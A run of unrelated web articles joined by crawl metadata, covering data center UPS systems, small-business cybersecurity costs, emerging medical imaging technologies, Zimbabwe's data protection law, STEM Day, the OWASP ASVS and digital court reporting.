Uninterruptible Power Supply (UPS) systems are essential for data centers to ensure uninterrupted power and protect critical infrastructure. They provide backup power during outages, prevent data loss, minimize downtime, and safeguard equipment against power disturbances. By understanding the different types of UPS systems and considering factors such as capacity, battery life, redundancy, efficiency, monitoring capabilities, and integration with power distribution infrastructure, data center operators can choose the right UPS solution that meets their specific needs.
Investing in a reliable UPS system is a crucial step toward securing uninterrupted power and maintaining the operational efficiency of data centers. As data centers continue to evolve and become more critical in the digital age, the importance of UPS systems in ensuring data integrity, system availability, and business continuity cannot be overstated. By prioritizing UPS solutions that align with their power requirements and operational goals, data center operators can enhance the reliability and resilience of their infrastructure, providing peace of mind and confidence in the face of power-related challenges.
Related Link: Why Hackers Love Smart Buildings [Security Update]
Last Updated on June 8, 2023 by Josh Mahan | <urn:uuid:3de2f885-bc4d-48fe-9f18-556072646e53> | CC-MAIN-2024-38 | https://cc-techgroup.com/data-center-ups/ | 2024-09-13T21:47:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00792.warc.gz | en | 0.925122 | 1,537 | 2.796875 | 3 |
Cyber attacks pose a significant threat to all businesses, with small businesses being especially valuable. Financially unprepared small firms may suffer significant losses and harm to their reputation, pricing strategy, productivity, staff morale, and other factors in the case of an unforeseen cyberattack. Understanding the potential severity of a cyber attack is crucial for entrepreneurs and small company owners to properly plan their operations. According to the report by the cyber security firm eSentire, the cost of cyber attacks is predicted to reach $10.5 trillion by 2025.
A Study by IBM and the Ponemon Institute showed that the standard overall cost of the breach is $4.35 million, with a crucial infrastructure data breach averaging a price of $4.82 million. This blog will discuss the hidden costs of being careless about security and how it can affect finances adversely.
Table of Content
- 1 Cost-benefit analysis for Cyber Security in Small Business
- 2 What happens when companies do not follow Cyber Security Guidelines?
- 3 How cyber attacks can be minimized?
- 4 Conclusion
Cost-benefit analysis for Cyber Security in Small Business
Small business owners worry about cybersecurity costs, but the benefits are greater. Cyber threats carry substantial risks, such as financial losses, harm to reputation, and legal responsibilities. Prioritizing cybersecurity builds trust, prevents fines, and brand reputation. Additionally, it reduces expensive downtime resulting from cyberattacks, affecting business continuity.
Conducting comprehensive research to find encompassing Cyber Security is essential. This approach allows small businesses to cut costs associated with deploying multiple tools and overcome resource limitations. The adoption of an all-in-one solution enables efficient allocation of the cyber security budget, providing a competitive edge in our increasingly digital landscape.
What happens when companies do not follow Cyber Security Guidelines?
If organizations do not follow cyber security guidelines, they can impact the organization’s financial losses, reputational damage, and operations. Implementing robust measures is essential to protect against these risks and ensure the overall health and success of the business.
Data breaches and Loss of Sensitive Information
Small companies often store sensitive customer records, which include credit card records or personal identities. Without proper cyber security features like encryption, admission to controls, and regular VAPT, these statistics may be accessed and stolen by cyber attackers.
For example, A small trading enterprise may additionally keep consumer fee information. If a cyber attacker breaches their machine because of vulnerabilities, they are able to steal that price information and use it fraudulently.
Financial Loss to Organization
A data breach can result in big monetary losses, such as fines, costs associated with the research and agreement of the incident, compensation for affected events, and legal fees. This would possibly result in a sizeable monetary burden for a small organization.
Damage to Organizational Reputation
A data breach or cyber-attack not only damages a business’s reputation but also raises doubts among customers about the organization’s data protection capabilities. The negative publicity of customer trust can have long-lasting repercussions, making it challenging to restore an organization’s image. For instance, news of a breach spreads, causing customers to lose confidence in the business’s ability to secure their information, ultimately resulting in decreased customer loyalty and reduced sales.
Cybersecurity laws like the General Data Protection Regulation (GDPR) and the Health Insurance Portability and Accountability Act (HIPAA) have strict fines and legal repercussions for violations.
How cyber attacks can be minimized?
A strong cybersecurity risk management strategy is essential to assisting your firm in lowering its exposure to cyber threats. To safeguard from cyber threats like ransomware and business email compromise (BEC), corporate executives must constantly update, hone, and test their cybersecurity defense methods. Here is the list of best practices how cyber attacks can be minimized:
Restricting and Managing Account Access
Starting the program with a zero-trust framework is advised, as account credentials are gathered by threat actors. This strategy only grants account privileges to users when they actually need them. Have protocols in place for safely resetting credentials, or automating credential management using a privileged access management platform. Update your offboarding and onboarding processes as well to reflect a zero-trust philosophy.
Implement signed software execution policies
An operating system should be configured to utilize secure boot, a function that ensures devices exclusively initiate using verified and secure software. This necessitates the enforcement of policies for executing signed software, device drivers, and system firmware. Allowing the execution of unsigned software could provide cyber attackers with a potential entry point.
Software Updates and Upgrades
Install software updates promptly and automate them for enhanced security. Cyber attackers quickly exploit the patch after it is released.
Book a Free Consultation with our Cyber Security Experts
Ignoring cybersecurity can result in notable financial and reputational harm, particularly for small businesses. Considering the enduring advantages, small businesses should prioritize cybersecurity, even with the initial expenses. Through the reduction of delays caused by cyber incidents, this strategy promotes trust, compliance, and business continuity.
Adopting comprehensive cybersecurity solutions optimizes resource management and offers a competitive advantage. Kratikal an auditor certified by CERT-In, specializes in delivering Vulnerability Assessment and Penetration Testing (VAPT) and Compliance Services. Leveraging these services effectively can bolster your company’s cybersecurity defenses. The experts at Kratikal identify and mitigate the vulnerabilities. Overall, proactive cybersecurity measures are vital in mitigating cyber threats and protecting business operations and reputation. | <urn:uuid:b5560825-2fbd-4e33-b93a-0999324c03ab> | CC-MAIN-2024-38 | https://kratikal.com/blog/unseen-costs-of-ignoring-cyber-security-for-small-business/ | 2024-09-18T20:57:24Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651941.8/warc/CC-MAIN-20240918201359-20240918231359-00392.warc.gz | en | 0.925827 | 1,119 | 2.6875 | 3 |
Ever since Wilhelm Conrad Röntgen discovered the X-rays in 1895, medical imaging has played an increasingly important role in clinical diagnostics helping clinicians screen, diagnose and monitor various health conditions. Beginning from a humble X-ray system, which still holds a significant position in medical imaging, the industry has seen the launch of Computed Tomography (CT), Mammography, Ultrasound, Magnetic Resonance Imaging (MRI), Positron Emission Tomography (PET), Bone Mineral Densitometry (BMD) and various other diagnostic modalities that have revolutionized the diagnostic and treatment protocols in the clinical world. Invasive exploratory surgeries which were considered standard a couple of decades ago, have been largely replaced with diagnostic imaging which are non-invasive and provide the physicians and surgeons with anatomical and functional details up to cellular and molecular levels. Imaging not only occupies an important role in screening and diagnostics but also forms the basis for interventional radiology, radiotherapy and image guidance procedures.
CT and X-ray continue to be the diagnostic modalities of choice for a large number of illnesses. Cathlabs and surgical c-arms have cemented their place in the OR and hybrid suites and look indomitable by any other technology in near future. The non-ionizing technologies such as MRI and Ultrasonography have carved out a superior position for themselves in certain applications. Most of these techniques have been around for at least a few decades and can be labelled as “mature” technologies. Despite the enormous progress made by the imaging industry in the recent past, several challenges have been restricting the utilization of these technologies to their maximum potential. Harmful effects of ionizing radiation are a key barrier for large scale utilization of X-ray based technologies. MRI, CT, and PET are expensive tests and as such not suitable for mass screening. The entire healthcare business is moving toward point-of-care testing and the imaging industry ranks low on portability and miniaturization parameters. Interestingly, there are several technologies in various stages of development which could potentially improvise the efficiency, minimize the harmful effects or challenge the gold standard imaging modalities by virtue of being safe, affordable, convenient, and suitable for mass screening.
In this article, we will briefly explore the promising technologies across different platforms impacting the imaging industry and dwell on the benefits for the clinicians and patients.
1) Innovation in existing imaging technologies
a) Phase Contrast Imaging (PCI)
b) Magnetoencephalogram-Magnetic Resonace Imaging (MEG-MRI)
c) Magnetic Resonance – Positron Emission Tomography (MR-PET)
d) Magneto Acoustic Tomography
a) Liquid Biopsy
3) Bioelectric signals
a) Electroretinogram (ERG) and Visually Evoked Potential (VEP)
4) Optical Technologies
a) Optical coherence tomography (OCT)
b) Capsule endoscopy/ Camera pills
5) Radiowave Imaging
a) Microwave Imaging
1. Innovation in existing imaging technologies
1.1. Phase Contrast Imaging (PCI)
Current x-ray modality is based on the principle of attenuation in varying grades by different tissues in the region of interest being imaged. The generation of contrast is solely dependent on the absorption of x-rays. Phase contrast imaging (PCI) is a new x-ray technology which leverages the diffraction property of tissues to introduce phase shift of the x-ray waveforms passing through it. This allows for a larger spectrum of contrast in x-ray imaging. Soft tissues with differing diffraction properties will be seen with different contrasts, thus increasing the utility of x-rays in non-bone imaging. PCI will utilize very low doses of X-ray than conventional x-ray and increase the spatial resolution as well. Visualization of different contrasts of soft tissue with lower radiation promises a wider spectrum of diagnostic and interventional applications for x-ray and CT. The challenges are that the research studies are all based on giant synchrotron sources of x-ray. Key milestone in realizing this technology would be perfecting the x-ray source from a normal focus or microfocus x-ray tube and an equivalent innovation in the detector sensors to capture the phase change contrasts. With the promise of lower X-ray dose and a broad contrast scale, PCI has enormous potential to disrupt conventional x-ray (diagnostic and interventional), mammography and CT imaging markets.
1.2. MEG –MRI
This hybrid technology combines the Magnetoencephalography (MEG) and ultra-low-field MRI techniques. The advantage with this combination is that the ultra-low field MRI will use superconducting quantum interference device (SQUID) sensors available in MEG instead of RF coils for detection. MEG technology detects the ultra-low magnetic field generated by the electricity in the neurons in the brain. Various institutions are exploring the possibility of using this technology for neuroimaging. Achieving MR signal detection with SQUID devices rather than the RF coils will be a key and significant milestone in the development of this imaging technology that will challenge the current standard standalone MRI and CT for neuroimaging.
1.3. MR – PET
The early PET-MRI imaging used to be done serially with both the equipment placed in adjacent rooms and patient shuttled quickly between these two rooms. With this method motion-induced artefact caused a huge concern in the image output. Truly integrated PET-MRI with single gantry system was introduced by Siemens and this system can be utilised to exploit the advantages of PET and MRI systems in the following disease areas
- Neuro Imaging – Alzheimers Amyloid Imaging
- Cardiac Imaging for assessing the morphology and function of cardiac wall, pericardium, valves, coronary arteries, ischaemia, infarction, wall thickness, wall motion, and so on
- Cancer Imaging – Head & Neck cancer, Breast cancer, Gastrointestinal tumors, Lung cancer, Gynecological cancer, Soft tissue and bone tumors
- Musculoskeletal imaging – joints, ligaments, tendon, osteomyelitis evaluation, and so on
- Inflammatory disorders
- Paediatric imaging in view of the lower radiation dose as compared to PET-CT
What is holding back the wider adoption of MR-PET is a clear definition of the clinical indications in which PET-MRI can be used. The usage has been mostly research based and minimally in clinical settings. While the indications are being defined regulatory and reimbursement issues are expected to be ironed out soon. This hybrid technology has the potential to become the gold standard for oncology imaging and neuro-imaging in the future challenging standalone PET, CT and MRI modalities.
1.4. Magneto Acoustic Tomography
It has been observed that the electrical properties of normal cells and cancerous cells are different. This is expected as a result of the differing water content, membrane permeability, extra cellular fluid and the orientation characteristics of the tumour cells. There are also notable electrical differences between ischaemic cells and normal cells. The differing electrical property between normal and cancerous/ischaemic cells is exploited to form this non-invasive technology. Of different methods to measure the electrical activity, coupling electromagnetic induction with ultrasonic detection seems to be more practical and lower in cost. Magnetoacoustic tomography with magnetic induction (MAT-MI) induces eddy current in the conductive sample and generates acoustic vibrations through Lorentz force coupling mechanism. Ultrasound waves are then sensed to reconstruct the electrical conductivity based image. This technology has enormous applications in cancer screening, diagnosis and treatment monitoring and the potential to challenge PET, CT, MRI, SPECT and mammography. The challenges are in improving sensitivity, instrumentation and reconstruction algorithms which are yet to reach acceptable levels to be used in clinical settings.
2.1. Liquid Biopsy
Liquid biopsies are based on measuring the circulating tumor cells (CTCs) and circulating tumor DNA (ctDNA) in the body fluids of the affected patients. These cells are released into the blood and other liquid tissues from the tumor. The CTCs are further enriched through specialised instruments and then enumerated to diagnose cancer or to monitor the treatment. The USFDA approved the first liquid biopsy test in June 2016 for the treatment planning of Non-small cell lung carcinoma (NSCLC). Subsequently, various products have been launched for diagnosis and treatment monitoring of lung carcinoma, breast cancer, prostrate and colorectal tumours. Liquid biopsy is increasingly being looked upon as a replacement for surgical biopsies since they have inherent advantages as compared to the tissue samples. Liquid biopsies are also increasingly transcending borders and demonstrating results that match with the gold standard imaging modalities such as PET, CT, MRI, SPECT and mammography in cancer diagnosis and assessing treatment response. Continuing research in liquid biopsies will further promote it to be either used in conjunction with the other imaging modalities or emerge as a standalone tool for cancer screening, diagnosis and treatment monitoring.
3. Bioelectric signals
3.1. Electroretinogram (ERG) and Visually Evoked Potentials (VEP)
Alzheimer’s disease (AD) is a progressive and irreversible neurodegenerative disease which eventually results in cognitive dysfunction and impairs the individual from performing basic routine tasks. Currently, no diagnostic modality assures of 100% sensitivity in AD and the diagnosis is confirmed only on brain autopsy after the individual’s death. Currently the brain imaging studies (CT, MRI and PET) and Cerebrospinal Fluid (CSF) protein studies are at the fore front of biomarker studies. However, these diagnostics are expensive, require elaborate infrastructure and pose a hindrance in screening large populations of the order of millions. Interestingly, in the recent past, several studies have looked at the retina as a possible diagnostic biomarker for AD. Since the eye is a natural extension of the brain, studies have explored and convincingly shown that Aβ plaques and neurofibriallry tangles, which are classical AD pathology seen in the brain tissue, are also seen in the retinal tissue either at the same time or earlier than seen in the brain. This finding has excited the scientific and medical community globally as the changes in the eye pathology can be monitored non-invasively and in a low resource setting without incurring high capital expenditures.
Electroretinogram (ERG) and Visual Evoked Potentials (VEP) in AD retina shows changes such as Slower N35, P50 implicit time, reduced P50, N95 amplitudes, reduced P1 amplitudes, Slower P100 implicit time, etc. Advantages of retinal biomarkers are that they are non-invasive, affordable and can be used for mass screening.
PET Imaging for the diagnosis of AD uses radiotracers with affinity for Aβ plaques and tau proteins. But the disadvantage of PET is that it cannot be used for population screening as it is a costly test, involves irradiation of the subject and a lower spatial resolution. CSF protein studies involve drawing samples through lumbar puncture procedure which makes it an unsuitable candidate for mass screening.
Key challenges of ERG or VEG techniques is that it is of low specificity as other illnesses such as glaucoma and aging also display similar findings. Other tests to rule out age related changes and other systemic diseases can increase the specificity of these tests.
4. Optical Technologies
4.1. Optical coherence tomography (OCT)
OCT exploits the properties of near-infrared light to generate cross-sectional images of the anatomy being studied. The resolution in OCT images ranges from 10 µm to 15 µm and is limited by the diffraction of natural light. OCT can also generate 3D volumetric images which can be valuable tool in cancer assessment. The technology will not involve large capital costs to acquire or to operate but the biggest disadvantage is its shallow depth of penetration (maximum 1 mm).
OCT is a commercialised technology and is already the standard of care in ophthalmology imaging. The technology is also being investigated in the following therapy areas for screening, diagnosis and monitoring.
- Cardiovascular: OCT can be utilized for detailed 3D imaging of the microstructure of coronary walls for the diagnosis of coronary lesions and for guiding interventional procedures.
- Gastrointestinal: OCT will be handy diagnostic tool for a large number of GI diseases and disorders such as Barrett’s Oesophagus, colon polyps, metastatic cancer, and so on
- Respiratory: Lung cancer diagnosis, biopsy, airway remodelling in COPD
- Urinary tract: Transition cell carcinoma, urethral tumors and nerve sparing surgery in prostate cancer
- Gynecology: cervical cancer, ovarian cancer, studying the fallopian tube patency for infertility
- Neuro Imaging: Retinal Nerve Fibre Layer thickness which is a biomarker for Alzhiemer’s Disease’
When OCT application development improvises it is largely expected to emerge as an alternate technology for Intravascular Ultrasound (IVUS) in cardiac applications, CT and MRI in several cancer screening and diagnostics, fluoroscopy in Hysterosalpingogram in Fallopian tube patency exploration and PET Imaging in Alzheimer’s Disease.
4.2. Capsule endoscopy/ Camera pills
Capsule endoscopy is a commercially available technology which uses a small, wireless camera built into disposable capsule which can be swallowed and excreted normally. The capsule travels the entire distance of the digestive tract capturing pictures in thousands until the batteries last and aided by a light source in the capsule. The captured images are transmitted to the paired storage device which is worn on the body. The capsule endoscopy when widely adopted will compete with colonoscopy and CT colon techniques. Adding a magnetic control to direct the flow of the capsule within the GI tract will increase the adoption of this technology amongst the surgeons. Current capsule endoscopy systems compress the images captured and hence the image quality is not satisfactory when compared to the conventional endoscopy systems. Battery life of the capsules also has been a major concern with the current technology as a short battery life could potentially not capture all the images in the region of interest. When these technology issues are ironed out, capsule endoscopy will emerge as a significant tool for screening and diagnosis for GI surgeons.
5. Radiowave Imaging
5.1. Microwave Imaging
Microwave Imaging (MI) for breast cancer detection exploits the dielectric contrast between malignant and healthy tissues. Microwave imaging can emerge as an alternate technology to mammography thus preventing painful breast compressions and exposure to harmful radiation. Microwave technology is also low cost alternative to the pricey ones such as MRI in breast imaging. Ultra-wide-band radar and Tomography are the two approaches being investigated for MI. UWB approach is largely dependent on sensors and the bandwidth of signal. Clinical trials have also demonstrated that it is possible to detect tumors of the size of 1 cm with tomography technique. The drawback of this technology is the heavy computational requirement that leads to a long output time. Studies have employed magnetic nanoparticles as contrast agent to improve the accuracy of the breast cancer detection.
Various technologies across different platforms are in different stages of development to realize a non-invasive, easy-to-use and low-cost device that is suitable for screening, diagnosis and treatment monitoring. Innovation in the existing imaging modalities, liquid biopsy and bioelectric signals look promising and closer to market. These technologies have to be closely tracked to understand whether these developments can blur the significance or form excellent complementary tools for the current standard imaging technologies.
If you would like more insights on Disruption in Medical Imaging, please connect with us! Email firstname.lastname@example.org and speak to a thought leader in this field.
This article was written with contributions from Dr. Suresh Kuppuswamy, Medical Imaging-Principal Analyst from the Frost & Sullivan’s Transformation Health Practice. | <urn:uuid:e12611bf-5401-48a3-8310-67cea073ecc4> | CC-MAIN-2024-38 | https://www.frost.com/growth-opportunity-news/conventional-medical-imaging-modalities-facing-disruption/ | 2024-09-20T04:27:42Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652130.6/warc/CC-MAIN-20240920022257-20240920052257-00292.warc.gz | en | 0.924383 | 3,348 | 2.90625 | 3 |
Access to Information and Protection of Privacy Act (Chapter 10:27);
Banking Act (Chapter 24:20);
Courts and Adjudicating Authorities (Publicity Restrictions) Act (Chapter 07:04);
Consumer Protection Act (Chapter 14:44);
Census and Statistics Act (Chapter 10:29);
Cyber and Data Protection Act (Chapter 12:07);
Interception of Communications Act (Chapter 11:20); and,
National Registration Act (Chapter 10:17);
Communication Technology (“ICT Policy”).
Definition of personal data
The Access to Information and Protection of Privacy Act defines personal information as recorded information about an identifiable person which includes:
- The person's name, address, or telephone number;
- The person's race, national or ethnic origin, religious or political beliefs or associations;
- The person's age, sex, sexual orientation, marital status, or family status;
- An identifying number, symbol or other particulars assigned to that person;
- Fingerprints, blood type or inheritable characteristics;
- Information about a person's healthcare history, including a physical or mental disability;
- Information about educational, financial, criminal or employment history;
- A third party's opinions about the individual;
- The individual's personal views or opinions (except if they are about someone else); and,
- Personal correspondence with home or family.
Definition of sensitive personal data
There is no law that defines Sensitive Personal Data. However, in terms of the Data Protection Act sensitive data refers to:
- information or any opinion about an individual which reveals or contains the following:
- racial or ethnic origin;
- political opinions;
- membership of a political association;
- religious beliefs or affiliations;
- philosophical beliefs;
- membership of a professional or trade association;
- membership of a trade union;
- sex life;
- criminal educational, financial or employment history;
- gender, age, marital status, or family status;
- health information about an individual;
- genetic information about an individual; or
- any information which may be considered as presenting a major risk to the rights of the data subject;
In terms of the Data Protection Act, the Postal and Telecommunication Regulatory Authority established in terms of section 5 of the Postal and Telecommunications Act [Chapter 12:05]; is the recognised National Data Protection Authority. The Authority has the responsibility to promote and enforce the fair processing of personal data and advise the Minister of Information Communication Technology on matters relating to privacy rights. The Authority is mandated to conduct inquiries and investigations either on its own accord or on the request of any interested person in relation to data protection rights.
Under the recently enacted Draft Protection Act, a data protection officer must be appointed to ensure the compliance with all obligations provided for in the Data Protection Act.
The Zimbabwe Media Commission's mandate does the following:
- Ensures that the people of Zimbabwe have equitable and wide access to information;
- Comments on the implications of proposed legislation or programs of public bodies on access to information and protection of privacy; and,
- Comments on the implications of automated systems for collection, storage, analysis, or transfer of information or for the access to information or protection of privacy.
The Revised ICT Policy proposes the establishment of a quasi-government entity to monitor Internet traffic. It states that all Internet gateways and infrastructure will be controlled by a single company, while a National Data Centre to support both public and high security services and information will be established.
There is no law that requires the registration of databases.
In terms of the Data Protection Act, a Data Protection Officer refers to any individual appointed by the data controller and is charged with ensuring, in an independent manner, compliance with the obligations provided for in this Act.
There are no specific provisions for the collectors of personal data to obtain the prior approval of data subjects for the processing of their personal data. However, when collecting data the controller or the controller’s representative shall provide the data subject with at least the following information:
- the name and address of the controller and of his or her representative, if any;
- the purposes of the processing;
- the existence of the right to object, by request and free of charge, to the intended processing of data relating to him or her, if it is obtained for the purposes of direct marketing;
- whether compliance with the request for information is compulsory or not, as well as what the consequences of the failure to comply are;
- taking into account the specific circumstances in which the data is collected, any supporting information, as necessary to ensure fair processing for the data subject, such as:
- the recipients or categories of recipients of the data;
- whether it is compulsory to reply, and what the possible consequences of the failure to reply are;
- the existence of the right to access and rectify the data relating to him or her except where such additional information, taking into account the specific circumstances in which the data is collected is not necessary to guarantee accurate processing.
- other information dependent on the specific nature of the processing, as specified by the Authority.
For purposes of processing the information Section 13 of the Data Protection Act is quite instructive. In terms of that Section every data controller or data processor shall ensure that personal information is:
- processed in accordance with the right to privacy of the data subject;
- processed lawfully, fairly and in a transparent manner in relation to any data subject;
- collected for explicit, specified and legitimate purposes and not further processed in a manner incompatible with those purposes;
- adequate, relevant, limited to what is necessary in relation to the purposes for which it is processed;
The Census and Statistics Act contains provisions which restrict the use and disclosure of information obtained during the conducting of a census exercise. Under this Act, authorities are able to collect, compile, analyse, and abstract statistical information relating to any of the following:
- General activities and conditions of the inhabitants of Zimbabwe and to publish such statistical information
The transfer of data to any other jurisdiction is governed in terms of Part VII of the Data Protection Act under section 28 and 29.
In terms of Section 28 of the Data Protection Act:
- a data controller may not transfer personal information about a data subject to a third party who is in a foreign country unless an adequate level of protection is ensured in the country of the recipient or within the recipient international organisation and the
data is transferred solely to allow tasks covered by the competence of the controller to be carried out. - The adequacy of the level of protection afforded by the third country or international organisation in question shall be assessed in the light of all the circumstances surrounding a data transfer operation or set of data transfer operations; with particular consideration being given to the nature of the data, the purpose and duration of the proposed processing operation or operations, the recipient third country or recipient international organisation, the laws relating to data protection in force in the third country or international organisation in question and the professional rules and security measures which are complied with in that third country or international organisation.
- The Authority shall lay down the categories of processing operations for which and the circumstances in which the transfer of data to countries outside the Republic of Zimbabwe is not authorised.
- The Minister responsible for the Cyber security and Monitoring Centre in consultation with the Minister, may give directions on how to implement this section with respect to transfer of personal information outside of Zimbabwe.
Section 18 of the Data Protection Act provides guidelines for the protection of data. It states that to safeguard the security, integrity and confidentiality of the data, the controller or his or her representative, if any, or the processor, shall take the appropriate technical and organisational measures that are necessary to protect data from negligent or unauthorised destruction, negligent loss, unauthorised alteration, or access and any other unauthorised processing of the data.
Further the Section also provides that the Data Protection Authority may issue appropriate standards relating to information security for all or certain categories of processing. Since the enactment of this Act the Data Protection Authority is still to issue any appropriate standards.
The Revised ICT Policy states that there will be development, implementation and promotion of appropriate security and legal systems for e-commerce, including issues related to cybersecurity, data protection and e-transactions. The Policy states that the following laws will be enacted to cater for intellectual property rights, data protection and security, freedom of access to information, computer related and cybercrime laws:
- data protection and privacy
- intellectual property protection and copyright
- consumer protection and
- child online protection.
Section 19 of the Data Protection Act places a duty on the data controller to notify the Authority “within twenty-four (24) hours of any security breach affecting data he or she processes.
Mandatory breach notification
Section 19 of the Data Protection Act uses the word “shall” which makes it mandatory to notify the Authority within twenty-four (24) hours.
The Constitution mandates the Human Rights Commission (HRC) to enforce a citizen's human rights where they have been violated. The right to privacy, including the right not to have the privacy of one's communication infringed, is a basic human right and, thus, falls within the purview of the HRC. However, the Cyber Security and Monitoring of Interceptions of Communications Centre (CSMICC), established by the Interception of Communications Act, is mandated to, among other things, monitor communications made over telecommunications, radio communications and postal systems and to give technical advice to service providers. The mandate of the CSMICC does not preclude it from monitoring computer-based data for the purposes of enforcing an individual's right to privacy where it is found that such right has been infringed.
Further, the CSMICC also has the duty to oversee the enforcement of the Act to ensure that it is enforced reasonably and with due regard to fundamental human rights and freedoms.
Zimbabwe recently enacted the Consumer Protection Act (Chapter 14:44) which has introduced several measures aimed at protecting consumers from unfair trade practices.
The Consumer Protection Act does not make specific reference to electronic marketing; however, it provides certain guidelines around electronic transactions, Information to be provided by the service provider, a cooling-off period in electronic transactions and unsolicited goods, services, or communications.
There is currently no specific online privacy legislation. | <urn:uuid:a12519d3-4136-47ef-96ef-d5b82f8ecaa2> | CC-MAIN-2024-38 | https://www.dlapiperdataprotection.com/index.html?t=contacts-section&c=ZW | 2024-09-12T23:43:01Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651498.46/warc/CC-MAIN-20240912210501-20240913000501-00092.warc.gz | en | 0.914948 | 2,127 | 3.109375 | 3 |
#STEM Day is designed to ignite young minds with the magic of science, technology, engineering, art, and mathematics, shaping innovators of tomorrow’s world. With reports of more STEM based jobs being created on a daily basis, but less young people choosing education pathways in this area, it’s essential to encourage young people to learn more about and pursue the amazing career opportunities there are within this field, including the digital infrastructure industry!
Here’s five suggestions for ways to celebrate National #STEMDay:
1. Ask the next young person you meet if they know what a data center is and share your knowledge about how important they are for our modern connected world
2. Listen to Inside Data Centres podcast special episode – UTC Special: Educating the Future Data Center Engineers and be inspired
3. Show your children the Kao Academy to find a ‘build your own data center’ print out activity, crossword puzzle, games and more!
4. Become a STEM ambassador and inspire the next generation to consider a career in this exciting sector
5. Think about what your organization can do to help young people learn about careers in this industry. Could you invite a local school for a tour of your facility or attend a careers fair? Make it your mission to do something to raise awareness! | <urn:uuid:24439205-d5f3-4da4-90c6-857af86551b1> | CC-MAIN-2024-38 | https://www.cnet-training.com/us/news/celebrate-stem-day-with-cnet/ | 2024-09-14T01:34:52Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.77/warc/CC-MAIN-20240913233654-20240914023654-00892.warc.gz | en | 0.92813 | 268 | 3.078125 | 3 |
While we’ve discussed OWASP (Open Web Application Security Project), it’s importance to the security of applications and development and the standards it sets, there are other aspects that deserve our attention. One of the primary elements of OWASP that demands such attention is the Application Security Verification Standard (ASVS).
If you use, have worked with or done any research on OWASP than you have inevitably run into the Application Security Verification Standard. So what exactly is the ASVS? What is it used for and why does it matter? These are questions that you should have or have probably already asked – and this is why you should know…
The ASVS was created by OWASP, often referred to as “the free and open software security community.” In that spirit and at its core ASVS was created by developers for developers. In order to understand the ASVS, it can be best explained by answering what it does and how it is used.
What it does is provide an established framework for security measures. How that is applied consists of varying levels of verification. Here is an overview of these two considerations that will help you to better understand the ASVS and its purpose.
OWASP provides measures, information and creates a common language and platform for developers, engineers and others in efforts to establish safe working environments for web applications. While OWASP has excelled in doing just that, verifying and confirming that those safety protocols are being met is the role of the ASVS.
What security measures are applied to what applications and what level of security does any particular application demand? These are the types of clarity that the ASVS provides, with the latter leading into how the ASVS is used and applied.
The OWASP.org site states that “The OWASP ASVS defines verification and documentation requirements… .” By defining and establishing these verification and documentation standards, applications can be measured against them and rated by security levels.
The OWASP ASVS uses a range of “levels” to classify and determine the web application security verification level. This allows developers to more easily determine and see real-world application security needs. A level 1 application, for instance, might suffice for a web application that doesn’t require any other level of verification. This hierarchical system of levels makes the determination of required application security simple and prevents less secure applications from getting through.
Although this sounds rather simple the work, years, time and effort invested into building the libraries, the OWASP community, and even the ASVS verification process is anything but simple. The ASVS uses an individual or team as part of its verification protocol. This person or these people are called a “verifier” and according to the OWASP site, “It is a verifier’s responsibility to determine if an application meets all of the requirements at the level targeted by a review.”
The technical language, the developer and programmer jargon and other web application security discussions can make all of this seem overwhelming. What many organizations want to know is why it matters to them…
On the whole, most business owners, company presidents, and CEOs aren’t web application security experts. That is why they hire security teams and invest heavily in security measures. This isn’t a hypothetical situation either, this is real web warfare.
One article discussing web application security began this way:
“Qatar National Bank, a recent victim of a data breach exposing over 1.4GB of customers’ data, including full personal data and credit card information, suspects it was compromised…”
That story went on to say…
“Later, the same hacking team compromised six more financial institutions, using vulnerabilities in their websites and web applications.”
There are countless other stories involving companies dealing with web application breaches, failures, and other serious occurrences. Why is web application security important for companies? There are plenty of businesses that could report millions of dollars worth of reasons and millions of customers too.
Any business that is succeeding and leading the way today, is connected. That means using web applications across a myriad of platforms and employing an array of different technologies. In order to succeed in the business market now, it requires a complete commitment to these technologies. To reach customers, develop new applications and interact on the business stage, security isn’t optional it is required.
This is where the advantage of using a system like the ASVS is completely realized. The first advantage offered through the ASVS is that it is an extension of the proven, supported and trusted OWASP principles and methodologies.
From this foundation, the level of application security is measured, documented and then rated and assigned a level as was previously discussed. This not only gives businesses peace of mind, it, more importantly, also offers a system that tests and proves applications and their level of security.
The companies that recognize the importance and practical reasons behind using the OWASP ASVS are already one step ahead. In addition to the security measures afforded through the ASVS, businesses can also promote the safety of their applications and interfaces.
Customer and clients today are educated and smart, that means they understand the importance of protecting their most private information. Perhaps, more than any other reason, it is the trust that a company can instill to their patrons because of measures like the ASVS.
We can do business safely, we can share data and information through web apps without great fear if we make security a top priority. Customers will see this as a safe environment. Our business partners will appreciate the efforts made to ensure safe business transactions, while our business will benefit because of these and many other reasons.
From the programmer, developer and architect side of the fence, this system offers metrics to gauge security levels and it provides clarity into live application scenarios. From the business side, it is how companies protect themselves and those they do business with – that is smart business and that is why companies need to know about the ASVS. | <urn:uuid:21615150-1a30-45df-ac7d-872d88fb3bc5> | CC-MAIN-2024-38 | https://www.kiuwan.com/blog/why-companies-need-to-know-about-the-owasp-application-security-verification-standard-asvs/ | 2024-09-15T06:20:12Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651616.56/warc/CC-MAIN-20240915052902-20240915082902-00792.warc.gz | en | 0.955754 | 1,238 | 2.78125 | 3 |
Artificial Intelligence is helping reshape the nature of work across a wide range of industries and positions; digital court reporting is no exception.
Crisis and surrounding environment
In May 2016, 17,700 Americans held jobs as court reporters, according to the Bureau of Labor Statistics (BLS). By May 2019 – the most recent date for which figures are available – that number had dropped to 14,530 – a decrease of almost 20%.
Long before the COVID-19 pandemic, the supply of court reporters was falling well short of the legal system’s demand, prompting many courts to integrate digital technology and automated transcription services to generate faster transcripts in order to meet increasing needs. Now, faced with a growing backlog of cases after one year of COVID-19, the courts need technology-enhanced court reporting more than ever.
Here are four things to know about the rise of digital court reporting and its impact.
1. It’s not replacing court reporters.
Even as more court systems adopt digital transcription technology, the job outlook for court reporters is still positive. According to BLS data, the number of court reporters is projected to increase 9% from 2019 to 2029.
